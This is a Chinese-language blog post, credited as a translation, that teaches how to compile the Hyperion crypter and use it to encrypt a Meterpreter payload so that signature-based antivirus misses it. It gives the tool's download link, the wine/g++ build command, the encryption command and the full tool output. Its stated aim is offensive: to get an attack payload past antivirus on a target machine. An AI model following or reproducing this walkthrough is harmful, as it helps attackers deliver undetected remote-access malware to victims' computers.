牛牛逼逼叉叉
菜单

好免杀,hyperion造

2014年02月11日,分类《网络安全》,作者:
博客捐助

在上一篇的那些年我们一起绕过的杀软中,是不是发现自己做出来的小东西总是被杀软杀呢?那好,今天,小编就来教你如果躲避让人讨厌的杀软…今天我们用来做演示的是一款加密工具hyperion.下文将 介绍他的工作原理以及如何被编译。

Hyperion是一款防止你的payload被杀毒软件爆菊的加密工具。它通过5轮AES(高级加密标准)加密来为你的payload做保护措施,而且加密后的payload是可以在windows系统下运行的。它的工作原理是酱紫的:  它输出一个可执行的加密文件,没错,这个文件就是你攻击时用的payload。  当这个输出文件生成并在目标机子上被执行之后, 这个可执行文件就会尝试暴力破解这个加密文件的AES加密算法的KEY, 破解之后就会自动运行这个被加密的文件 (meterpreter payload  ).

说了这么多,然而我们这么获得并编译它呢?别急别急,好戏才刚刚开始:

Hyperion下载地址: http://nullsecurity.net/tools/binary.html

下载完毕并解压之后,发现有Makefile文件,so easy啦!什么你还是菜鸟不会?好吧…你淫了。如果你有变态5,可以尝试一下下面的傻瓜式编译:

先进入以下目录:

1 cd    ~/.wine/drive_c/MinGW/bin/

 

把下载解压后的源码放在 “Src”目录下.  然后执行以下的命令:

1 wine g++.exe Hyperion-1.0/Src/Crypter/*.cpp -o hyperion.exe

 

如果命令没错的话, 现在hyperion.exe就已经做好了,下一步就是来为我们的payload编码加密了,整个流程都是自动化的,你只需指定输出文件夹路径与输出文件名称,然后一个做好免杀的payload就出来了,整个过程看上去就像下面所示:

1 root@bt:~/.wine/drive_c/MinGW/bin/Hyperion-1.0# wine hyperion.exe metexecutable.exe encryptedmet.exe

 

执行结果:

Opening metexecutable.exe
Copied file to memory: 0×115868
Found valid MZ signature
Found pointer to PE Header: 0×80
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0×400000

Found Section: .text
VSize: 0×924, VAddress: 0×1000, RawSize: 0xa00, RawAddress: 0×400

Found Section: .data
VSize: 0x5f0, VAddress: 0×2000, RawSize: 0×600, RawAddress: 0xe00

Found Section: .rdata
VSize: 0xc0, VAddress: 0×3000, RawSize: 0×200, RawAddress: 0×1400

Found Section: .bss
VSize: 0xe0, VAddress: 0×4000, RawSize: 0×0, RawAddress: 0×0

Found Section: .idata
VSize: 0×268, VAddress: 0×5000, RawSize: 0×400, RawAddress: 0×1600

Input file size + Checksum: 0×4140
Rounded up to a multiple of key size: 0×4150
Generated Checksum: 0xcf0cc
Generated Encryption Key: 0×0 0×2 0×1 0×2 0×3 0×3 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0 0×0

Written encrypted input file as fasm array to:
-> SrcFasmContainer32infile.asm

Written input file’s image base to:
-> SrcFasmContainer32imagebase.asm

Written input file’s image size to:
-> SrcFasmContainer32sizeofimage.asm

Written keysize to:
-> SrcFasmContainer32keysize.inc

Starting FASM with the following parameters:
Commandline: FasmFASM.EXE SrcFasmContainer32main.asm encryptedmet.exe
FASM Working Directory: C:MinGWbinHyperion-1.0

Executing fasm.exe

flat assembler version 1.69.31 (1020166 kilobytes memory)
5 passes, 0.1 seconds, 35328 bytes.

 

嗯哼,现在大多数靠特征码查杀的杀软就能轻松绕过了.但是启发式杀毒的就不一定啦…小编也没那么蛋疼装十几个杀毒软件一个一个做测试吧…

祝各位好运,如果有什么有趣的情况,欢迎在楼下跟帖评论~~~

 

本文由网络安全攻防研究室(www.91ri.org) 信息安全小组原创翻译,转载文章请注明本文链接及原文出处!



发表评论

电子邮件地址不会被公开。 必填项已用*标注

【上一篇】

Fixed Navigation - Codrops

【下一篇】

那些年一起绕过的杀软